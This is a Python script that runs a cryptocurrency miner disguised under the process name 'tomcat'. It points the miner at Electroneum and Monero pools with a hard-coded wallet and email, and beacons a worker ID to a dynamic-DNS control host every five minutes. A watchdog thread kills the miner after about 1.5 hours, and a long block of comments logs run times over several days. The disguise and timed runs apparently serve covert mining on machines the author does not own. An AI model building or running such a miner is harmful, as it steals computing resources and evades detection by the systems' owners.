import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:10:04.018216
#2018-02-17 16:56:05.137875
#2018-02-17 18:46:01.916479
#2018-02-17 20:35:07.136009
#2018-02-17 22:21:05.646189
#2018-02-18 00:05:07.488536
#2018-02-18 01:56:06.338146
#2018-02-18 03:44:06.027929
#2018-02-18 05:32:07.704114
#2018-02-18 07:26:07.431157
#2018-02-18 09:13:06.711117
#2018-02-18 10:59:05.091992
#2018-02-18 12:46:01.855659
#2018-02-18 14:34:04.238264
#2018-02-18 16:24:06.781251
#2018-02-18 18:13:05.181717
#2018-02-18 19:59:05.150687
#2018-02-18 21:46:01.951921
#2018-02-18 23:35:01.628251
#2018-02-19 01:21:03.784496
#2018-02-19 03:09:04.822611
#2018-02-19 04:54:07.266946
#2018-02-19 06:38:04.627734
#2018-02-19 08:27:05.702770
#2018-02-19 10:16:02.088078
#2018-02-19 12:03:02.009091
#2018-02-19 13:49:09.335408
#2018-02-19 15:39:10.371249
#2018-02-19 17:25:08.357983
#2018-02-19 19:13:01.552967
#2018-02-19 21:02:03.610180
#2018-02-19 22:48:07.409611
#2018-02-20 00:32:08.675791
#2018-02-20 02:19:07.085400
#2018-02-20 04:09:07.006549
#2018-02-20 05:52:04.975624
#2018-02-20 07:38:01.971405
#2018-02-20 09:22:07.776047
#2018-02-20 11:06:06.722936
#2018-02-20 12:54:01.516479
#2018-02-20 14:40:08.654493
#2018-02-20 16:25:07.381498
#2018-02-20 18:11:04.419200
#2018-02-20 20:02:06.099862
#2018-02-20 21:48:03.756135
#2018-02-20 23:30:02.584358
#2018-02-21 01:14:03.865687
#2018-02-21 03:02:03.238738
#2018-02-21 04:49:06.963771
#2018-02-21 06:39:01.739293
#2018-02-21 08:25:02.370341
#2018-02-21 10:11:07.047176
#2018-02-21 11:59:01.450810
#2018-02-21 13:49:01.755308
#2018-02-21 15:27:06.710044
#2018-02-21 17:17:02.044739
#2018-02-21 19:04:08.675882
#2018-02-21 20:52:05.870285
#2018-02-21 22:37:05.691670
#2018-02-22 00:27:01.321400
#2018-02-22 02:14:04.367956
#2018-02-22 04:01:05.890419
#2018-02-22 05:46:08.374687
#2018-02-22 07:31:02.080899
#2018-02-22 09:18:04.999126
#2018-02-22 11:05:09.203472
#2018-02-22 12:51:08.026185
#2018-02-22 14:37:05.839628
#2018-02-22 16:23:05.975963
#2018-02-22 18:09:12.843058
#2018-02-22 19:58:07.252626
#2018-02-22 21:47:03.801043
#2018-02-22 23:36:03.835629
#2018-02-23 01:23:07.665874
#2018-02-23 03:11:06.157047
#2018-02-23 04:59:07.219216
#2018-02-23 06:44:06.841088
#2018-02-23 08:37:03.664900
#2018-02-23 10:51:06.984184
#2018-02-23 12:48:01.872686
#2018-02-23 14:32:04.324149
#2018-02-23 16:22:06.779109
#2018-02-23 18:08:08.375937
#2018-02-23 19:53:02.171543
#2018-02-23 21:37:06.092057
#2018-02-23 23:25:09.530318
#2018-02-24 01:17:04.231563
#2018-02-24 03:07:06.936330
#2018-02-24 04:53:03.353576
#2018-02-24 06:37:07.143577
#2018-02-24 08:26:01.586241
#2018-02-24 10:12:03.520329
#2018-02-24 12:06:05.448771
#2018-02-24 13:53:05.071852
#2018-02-24 15:32:04.494456
#2018-02-24 17:26:01.589708
#2018-02-24 19:13:07.705405
#2018-02-24 21:01:06.361839
#2018-02-24 23:34:03.650071
#2018-02-25 02:55:07.850852
#2018-02-25 06:58:04.389992